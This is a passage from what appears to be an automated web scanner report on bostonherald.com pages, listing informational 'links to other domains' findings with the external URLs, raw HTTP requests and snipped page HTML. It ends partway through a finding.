1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>
<a class="orange" href="http://www.homefind.com">Search Homes</a>  |  
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>  |  
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker’s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.264. http://www.bostonherald.com/blogs/sports/rap_sheet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/rap_sheet/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/blogs/sports/rap_sheet/?srvc=home&position=recent

The response contains the following links to other domains:

http://bcove.me/6oguf24t
http://bcove.me/jq9h39r3
http://c.brightcove.com/services/viewer/federated_f9?isVid=1
http://cache.heraldinteractive.com/CSS/dropdown.css
http://cache.heraldinteractive.com/CSS/index.css
http://cache.heraldinteractive.com/CSS/sports.css
http://cache.heraldinteractive.com/CSS/subnavigation.css
http://cache.heraldinteractive.com/CSS/tabbed.css
http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/CSS/version5.0/patriots.css
http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/rssGrey11.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/sports/discovering_devin/McCourty_310x100.jpg
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://feeds.feedburner.com/bostonherald/
http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/2
http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/6
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://profootballtalk.nbcsports.com/2011/01/27/nfl-stresses-immediate-consequences-of-possible-lockout/
http://sports.espn.go.com/ncf/player/profile?playerId=235808
http://twitter.com/
http://www.carfind.com/
http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBMQFjAA&url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2010%2F11%2F30%2Fpatriots-qb-tom-brady-now-endorsing-the-boots-my-wife-wears%2F&rct=j&q=Rap%20Sheet%20BRady%20Uggs&ei=NANDTY_ZOcOB8gaSlu24AQ&usg=AFQjCNFw3KIS_t1eB_Vew-79zoo6yD1CBg&sig2=WBrzzR3H0XX0Q3gXTwFkzQ&cad=rja
http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBcQFjAA&url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2011%2F01%2F14%2Fwhy-is-patriots-rb-benjarvus-green-ellis-always-so-positive-and-links%2F&rct=j&q=Rap%20Sheet%20Green-Ellis%20positive%20yards&ei=vXxBTYS6NIPpgQfr08XMAQ&usg=AFQjCNFs93srIrRIMWcjlJNqetsJyngKoA&sig2=dpufrHU-q6YaX7UMvpfX-Q&cad=rja
http://www.homefind.com/
http://www.imageyenation.com/images/blog-gallery/kylie_ugg_boots.jpg

Request

GET /blogs/sports/rap_sheet/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/sports.css" media="screen,projection" />


   <link rel="stylesheet" type="text/css" href="/CSS/blogsInside.css" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/patriots.css" media="screen,projection" />

<script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/sports/football/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="90px" width:"200px" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />News & Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong>. <a href="http://bcove.me/6oguf24t"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=767806748001&playerID=84359688001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>is more than a football player. He’s a celebrity, too, selling <a href="http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBMQFjAA&url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2010%2F11%2F30%2Fpatriots-qb-tom-brady-now-endorsing-the-boots-my-wife-wears%2F&rct=j&q=Rap%20Sheet%20BRady%20Uggs&ei=NANDTY_ZOcOB8gaSlu24AQ&usg=AFQjCNFw3KIS_t1eB_Vew-79zoo6yD1CBg&sig2=WBrzzR3H0XX0Q3gXTwFkzQ&cad=rja">everything from the same shoes</a>
...[SNIP]...
<strong><a href="http://www.imageyenation.com/images/blog-gallery/kylie_ugg_boots.jpg">The Banktress</a>
...[SNIP]...
<p>He’s a pretty powerful athlete. <a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/2">Recently, Business Week Magazine released a list of exactly how powerful</a>
...[SNIP]...
<p><a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/6"><u>
...[SNIP]...
hat’s where this comes in. Want to see some of the Senior Bowl’s best pass-rushers battle some of its best offensive linemen? Cool. With my new-and-improved Flip camera, I got you covered. <a href="http://bcove.me/jq9h39r3"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=766823050001&playerID=84359688001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>, the director of football operations of Perennial Sports and Entertainment, <a href="http://twitter.com/#!/RapSheet/statuses/30752231791796225">said as much in a Tweet</a>
...[SNIP]...
<p><a href="http://sports.espn.go.com/ncf/player/profile?playerId=235808">Sanzenbacher shares several characteristics</a>
...[SNIP]...
gn="right" width="256" height="256" />Earlier today, the NFL offices hosted 10 reporters for a meeting breaking down various aspects of the impending labor disasterbacle. Alas, I wasn’t invited. <a href="http://profootballtalk.nbcsports.com/2011/01/27/nfl-stresses-immediate-consequences-of-possible-lockout/">But Pro Football Talk’s<strong>
...[SNIP]...
<p>The league, <a href="http://twitter.com/#!/greggrosenthal/statuses/30718247296835584">though people such as NFL chief negotiator <strong>
...[SNIP]...
e="RB senior bowl" alt="RB senior bowl" align="right" width="256" height="129" />Of all the holes the Patriots have looking toward 2011, the spot at running back is kind of undercover. They did have a <a href="http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBcQFjAA&url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2011%2F01%2F14%2Fwhy-is-patriots-rb-benjarvus-green-ellis-always-so-positive-and-links%2F&rct=j&q=Rap%20Sheet%20Green-Ellis%20positive%20yards&ei=vXxBTYS6NIPpgQfr08XMAQ&usg=AFQjCNFs93srIrRIMWcjlJNqetsJyngKoA&sig2=dpufrHU-q6YaX7UMvpfX-Q&cad=rja">1,000-yard rusher in<strong>
...[SNIP]...
<font class=bodyFont color=#333333>
   <img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif">
   <div style="position:absolute; top:25px; right:15px">
...[SNIP]...
<a href=http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/feed/><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssGrey11.gif" border=0>RSS Feed</a>
...[SNIP]...
<p>
   <img src="http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg" style="float:left; padding:0 3px 5px 0">
Patriots beat reporter <b>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif" style="float:left; padding:0 3px 5px 0">
    <b>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/category/discovering-devin/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/sports/discovering_devin/McCourty_310x100.jpg" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.265. http://www.bostonherald.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/business/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Findex.bg&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/business
http://feeds.feedburner.com/bostonherald/business/
http://feeds.feedburner.com/bostonherald/business/automotive
http://feeds.feedburner.com/bostonherald/business/general
http://feeds.feedburner.com/bostonherald/business/healthcare
http://feeds.feedburner.com/bostonherald/business/media
http://feeds.feedburner.com/bostonherald/business/real_estate
http://feeds.feedburner.com/bostonherald/business/technology
http://feeds.feedburner.com/bostonherald/business/technology/reviews
http://feeds.feedburner.com/bostonherald/business/womens
http://feeds.feedburner.com/bostonherald/jobfind/news/your_career
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=3&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&prodtype=M&thisponsor=cf1&ad=mtg&nav=mtg30year_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&prodtype=D&ad=dep&nav=1yearcd_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&prodtype=A&ad=auto&nav=48mo_newcar_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&prodtype=L&ad=loan&nav=heloc30k_graph&page=default
http://www.bankrate.com/brm/images/artwork/arrow_ball.gif
http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif
http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif
http://www.bankrate.com/brm/images/brm_nd/bullet.gif
http://www.bankrate.com/brm/images/brm_nd/graph.gif
http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn
http://www.bankrate.com/funnel/auto/?pid=p:bhn&prods=39
http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&prods=15&local=true
http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&prods=50
http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&prods=1
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Findex.bg&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.266. http://www.bostonherald.com/business/general/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/business/general/?srvc=home&position=6

The response contains the following links to other domains:

